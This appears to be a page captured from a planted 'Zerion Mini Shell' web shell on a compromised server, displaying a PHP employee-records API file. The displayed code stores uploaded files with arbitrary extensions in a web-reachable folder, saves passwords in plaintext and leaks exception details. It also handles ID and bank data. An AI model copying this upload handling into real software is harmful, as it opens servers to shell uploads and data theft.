ok

Mini Shell

Direktori : /home2/selectio/www/obnovit-tracking/api/
Upload File :
Current File : /home2/selectio/www/obnovit-tracking/api/update-employee-api.php

<?php
session_start();
include"../config/config.php";
if(isset($_POST['type']) && $_POST['type']=='create_employe'){
        try{
            $date = date('Y-m-d h:i:s', time());
            
          
            
            // $month =date('m',strtotime($_POST['employee_date']));
            // $year =date('Y',strtotime($_POST['employee_date']));
            
             if(isset($_FILES['photo']) && $_FILES["photo"]["name"]!=""){
                        $extension = end(explode(".", $_FILES["photo"]["name"]));
                        $image = rand(10,1000000000)."-".$date."-image." . $extension;
                        $upload = move_uploaded_file($_FILES['photo']['tmp_name'], '../upload/' . $image);
                        $upload_image = '../upload/' . $image;   
                }
                else{
                    $upload_image='';
                } 
                
                 if(isset($_FILES['offer_letter']) && $_FILES["offer_letter"]["name"]!=""){
                        $extension2 = end(explode(".", $_FILES["offer_letter"]["name"]));
                        $image2 = rand(10,1000000000)."-".$date."-image." . $extension2;
                        $upload2 = move_uploaded_file($_FILES['offer_letter']['tmp_name'], '../upload/' . $image2);
                        $upload_image2 = '../upload/' . $image2;   
                }
                else{
                    $upload_image2='';
                }
                 if(isset($_FILES['joining_leter']) && $_FILES["joining_leter"]["name"]!=""){
                        $extension3 = end(explode(".", $_FILES["joining_leter"]["name"]));
                        $image3 = rand(10,1000000000)."-".$date."-image." . $extension3;
                        $upload3 = move_uploaded_file($_FILES['joining_leter']['tmp_name'], '../upload/' . $image3);
                        $upload_image3 = '../upload/' . $image3;   
                }
                else{
                    $upload_image3='';
                }
                 if(isset($_FILES['contract']) && $_FILES["contract"]["name"]!=""){
                        $extension4 = end(explode(".", $_FILES["contract"]["name"]));
                        $image4 = rand(10,1000000000)."-".$date."-image." . $extension4;
                        $upload4 = move_uploaded_file($_FILES['contract']['tmp_name'], '../upload/' . $image4);
                        $upload_image4 = '../upload/' . $image4;   
                }
                else{
                    $upload_image4='';
                }
                 if(isset($_FILES['certificate10']) && $_FILES["certificate10"]["name"]!=""){
                        $extension5 = end(explode(".", $_FILES["certificate10"]["name"]));
                        $image5 = rand(10,1000000000)."-".$date."-image." . $extension5;
                        $upload5 = move_uploaded_file($_FILES['certificate10']['tmp_name'], '../upload/' . $image5);
                        $upload_image5 = 'image/' . $image5;   
                }
                else{
                    $upload_image5='';
                }
                 if(isset($_FILES['certificate12']) && $_FILES["certificate12"]["name"]!=""){
                        $extension6 = end(explode(".", $_FILES["certificate12"]["name"]));
                        $image6 = rand(10,1000000000)."-".$date."-image." . $extension6;
                        $upload6 = move_uploaded_file($_FILES['certificate12']['tmp_name'], '../upload/' . $image6);
                        $upload_image6 = '../upload/' . $image6;   
                }
                else{
                    $upload_image6='';
                }
                 if(isset($_FILES['certificateug']) && $_FILES["certificateug"]["name"]!=""){
                        $extension7 = end(explode(".", $_FILES["certificateug"]["name"]));
                        $image7 = rand(10,1000000000)."-".$date."-image." . $extension7;
                        $upload7 = move_uploaded_file($_FILES['certificateug']['tmp_name'], '../upload/' . $image7);
                        $upload_image7 = '../upload/' . $image7;   
                }
                else{
                    $upload_image7='';
                }
                 if(isset($_FILES['certificatepg']) && $_FILES["certificatepg"]["name"]!=""){
                        $extension8 = end(explode(".", $_FILES["certificatepg"]["name"]));
                        $image8 = rand(10,1000000000)."-".$date."-image." . $extension8;
                        $upload8 = move_uploaded_file($_FILES['certificatepg']['tmp_name'], '../upload/' . $image8);
                        $upload_image8 = '../upload/' . $image8;   
                }
                else{
                    $upload_image8='';
                }
                 if(isset($_FILES['docaddress']) && $_FILES["docaddress"]["name"]!=""){
                        $extension9 = end(explode(".", $_FILES["docaddress"]["name"]));
                        $image9 = rand(10,1000000000)."-".$date."-image." . $extension9;
                        $upload9 = move_uploaded_file($_FILES['docaddress']['tmp_name'], '../upload/' . $image9);
                        $upload_image9 = '../upload/' . $image9;   
                }
                else{
                    $upload_image9='';
                }
                 if(isset($_FILES['pancard']) && $_FILES["pancard"]["name"]!=""){
                        $extension10 = end(explode(".", $_FILES["pancard"]["name"]));
                        $image10 = rand(10,1000000000)."-".$date."-image." . $extension10;
                        $upload10 = move_uploaded_file($_FILES['pancard']['tmp_name'], '../upload/' . $image10);
                        $upload_image10 = '../upload/' . $image10;   
                }
                else{
                    $upload_image10='';
                }
                 if(isset($_FILES['proof']) && $_FILES["proof"]["name"]!=""){
                        $extension11 = end(explode(".", $_FILES["proof"]["name"]));
                        $image11 = rand(10,1000000000)."-".$date."-image." . $extension11;
                        $upload11 = move_uploaded_file($_FILES['proof']['tmp_name'], '../upload/' . $image11);
                        $upload_image11 = '../upload/' . $image11;   
                }
                else{
                    $upload_image11='';
                }
                 if(isset($_FILES['resume']) && $_FILES["resume"]["name"]!=""){
                        $extension12 = end(explode(".", $_FILES["resume"]["name"]));
                        $image12 = rand(10,1000000000)."-".$date."-image." . $extension12;
                        $upload12 = move_uploaded_file($_FILES['resume']['tmp_name'], '../upload/' . $image12);
                        $upload_image12 = '../upload/' . $image12;   
                }
                else{
                    $upload_image12='';
                }
       /* $statement = $pdo->prepare("UPDATE tbl_user SET emp_name=?,fname=?,emp_mobile=?,username=?,permanentadress=?,password=?,address=?,altermolbile=?,aadhar=?,nationality=?,married_status=?,comment=?,email=?,aadhar=?,pftype=?,accontername=?,account_number=?,bankname=?,branch=?,bankcode=?,gender=?,dob=?,department_id=?,designation_id=?,created_by=?,joining_date=?,pf_id=? WHERE id=?");
        $result=$statement->execute(array($_POST['name'],$_POST['fname'],$_POST['mobile'],$_POST['email'],$_POST['permanentadress'],$_POST['password'],$_POST['adress'],$_POST['altermolbile'],$_POST['aadhar'],$_POST['national'],$_POST['status1'],$_POST['comment'],$_POST['role1'],$_POST['email'],$_POST['employeeid'],$_POST['pftype'],$_POST['accontername'],$_POST['account_number'],$_POST['bankname'],$_POST['branch'],$_POST['bankcode'],$_POST['category'],$_POST['dob'],$_POST['department'],$_POST['desgination'],$_SESSION['hrm']['id'],$_POST['joiningdate'],$_POST['pftype']));*/
        $statement = $pdo->prepare("INSERT INTO `tbl_user`(`emp_name`, `fname`, `emp_mobile`, `username`, `permanentadress`, `password`, `address`,`altermolbile`, `aadhar`, `nationality`, `married_status`, `comment`,`role`, `email`, `employeeid`, `pftype`, `accontername`,`account_number`, `bankname`, `branch`, `bankcode`, `gender`,`dob`, `department_id`, `designation_id`, `created_by`,joining_date,pf_id) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)");
            $result=$statement->execute(array($_POST['name'],$_POST['fname'],$_POST['mobile'],$_POST['email'],$_POST['permanentadress'],$_POST['password'],$_POST['adress'],$_POST['altermolbile'],$_POST['aadhar'],$_POST['national'],$_POST['status1'],$_POST['comment'],$_POST['role1'],$_POST['email'],$_POST['employeeid'],$_POST['pftype'],$_POST['accontername'],$_POST['account_number'],$_POST['bankname'],$_POST['branch'],$_POST['bankcode'],$_POST['category'],$_POST['dob'],$_POST['department'],$_POST['desgination'],$_SESSION['hrm']['id'],$_POST['joiningdate'],$_POST['pftype']));
                    
                    if($result){
                        $return_arr['message'] = 'Employee added successfully!';
                        $return_arr['status']=200;
                          
                    }else{
                        $return_arr['message']="Something went wrong try again...";
                        $return_arr['status']=400;
                    }  
                }catch(Exception $e){
                    $return_arr['message']='0987'.$e;
                    $return_arr['status']=500;
                }   
                echo json_encode($return_arr);
    }

?>

Zerion Mini Shell 1.0